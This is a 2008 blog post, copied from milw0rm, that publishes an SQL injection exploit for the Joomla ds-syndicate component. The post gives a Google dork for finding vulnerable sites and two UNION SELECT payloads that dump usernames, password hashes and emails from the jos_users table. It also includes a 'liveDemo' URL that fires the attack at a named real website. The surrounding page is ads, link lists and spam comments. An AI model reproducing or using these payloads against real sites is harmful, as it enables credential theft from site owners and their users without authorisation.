All about information from internet

You can get some information about internet from here

  • Home
  • About

20

Oct

Joomla com_ds-syndicate Sql-injetion vulnerability

Posted by admin  Published in Hacking

Play online games at GameDuell.
New Training Titles for Audio Software, Hardware & Technical Skills.
Shockwave has the game Risk! Buy it now!
Join LinkShare Today!
SYNC Outlook and Files on all your Computers
#############################################

#Joomla com_ds-syndicate Sql-injetion vulnerability #

#############################################

#[~] Author : boom3rang

#[~] HomePage: www.khg-crew.ws

#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.

#[~] Kosova Hackers Group

#[!] Component_Name: ds-syndicate

#[!] Script_Name: Joomla

#[!] Google_Dork: inurl:”com_ds-syndicate”

#############################################

#[~] Exp: http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]

#[~] Exploit [1]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users–

#[~] Exploit [2]:

1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–

#[!] Note:

If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).

#[~] liveDemo:

http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users–

ps. here in this liveDemo you need to download file =feed1= .

#############################################

#[!] Proud 2 be Albanian

#[!] Proud 2 be Muslim

#[!] United States of Albania

#############################################

(Captured from milw0rm.com)

Related Articles

  • TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities (June 22nd, 2009)
  • Apple MACOS X xnu <= 1228.x local kernel memory disclosure (March 8th, 2009)
  • Coppermine Photo Gallery (March 8th, 2009)
  • Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability (February 9th, 2009)
  • Flax Article Manager 1.1 Remote File Upload Vulnerability (February 9th, 2009)

No user responded in this post

Subscribe to this post comment rss or trackback url

Top Search

Recent Posts

  • phportal 1.0 Insecure Cookie Handling Vulnerability
  • fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC
  • TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities
  • Download Yellowsn0w to Unlock iPhone 3G Firmware 2.2 Baseband 02.28.0
  • How to Jailbreak iPhone 3G or iPod Touch Firmware 2.2.1 with QuickPWN 2.2.5
  • How to Downgrade iPhone Firmware 3.0 to 2.2.1
  • How to Downgrade iPhone 2.2.1 to iPhone 3G 2.2 (Firmware 2.2.1 to Firmware 2.2)
  • Portable CowBall v1.01
  • Apple MACOS X xnu <= 1228.x local kernel memory disclosure
  • Coppermine Photo Gallery

Visitor

Sponsored

Filesharing with SYNCING.NET 10% Discount





GameDuell Inc. - Play sudoku

Atom Entertainment (formerly AtomShockwave)

LinkShare  Referral  Prg





Try if Free-Total Training Online

Buy Now

Categories

  • Games (16)
  • Hacking (95)
  • Software (65)
  • Virus (6)

Calendar

October 2008
M T W T F S S
    Nov »
 12345
6789101112
13141516171819
20212223242526
2728293031  

Archives

  • June 2009 (3)
  • April 2009 (4)
  • March 2009 (3)
  • February 2009 (15)
  • January 2009 (29)
  • December 2008 (54)
  • November 2008 (44)
  • October 2008 (30)

Links

  • .:: Smartz-t-two::.
  • ::: Hyperion-bd.com :::
  • Backpack to Buggy
  • Boomstike ePlan’s
  • Buy Herbalife Products Online
  • CopySmith
  • krasnoyarsk26.com
  • mfdhousing.com
  • Software Information Details
  • thepeopleschemist.com
  • Welcome to Global HD

Recent Entries

  • phportal 1.0 Insecure Cookie Handling Vulnerability
  • fuzzylime cms
  • TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities
  • Download Yellowsn0w to Unlock iPhone 3G Firmware 2.2 Baseband 02.28.0
  • How to Jailbreak iPhone 3G or iPod Touch Firmware 2.2.1 with QuickPWN 2.2.5
  • How to Downgrade iPhone Firmware 3.0 to 2.2.1
  • How to Downgrade iPhone 2.2.1 to iPhone 3G 2.2 (Firmware 2.2.1 to Firmware 2.2)
  • Portable CowBall v1.01
  • Apple MACOS X xnu
  • Coppermine Photo Gallery

Recent Comments

  • keaton in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • VopNeessAgete in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • XRumerTest in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • greetingsfrompoland in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • annabobic in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • Celoe in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • annabobic in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • mittamnpync in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • QJJohn in Multi SEO phpBB 1.1.0 Remote File Inclusion Vulner…
  • Nuzosuqwurok in World of Warcraft: The Wrath of the Lich King revi…
  • Random Selection of Posts

    • AVG Anti-Virus Free Edition
    • PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection Vulnerability
    • Bejeweled 2 Deluxe
    • Joomla Component Tech Article 1.x (item) SQL Injection Vulnerability
    • TOP FLV Video Converter
    • Look@LAN Network Monitor 2.5 build 35
    • Space Trader: Merchant Marine review (PC)
© 2008 All about information from internet is proudly powered by WordPress
Theme designed by MILD-INFO.COM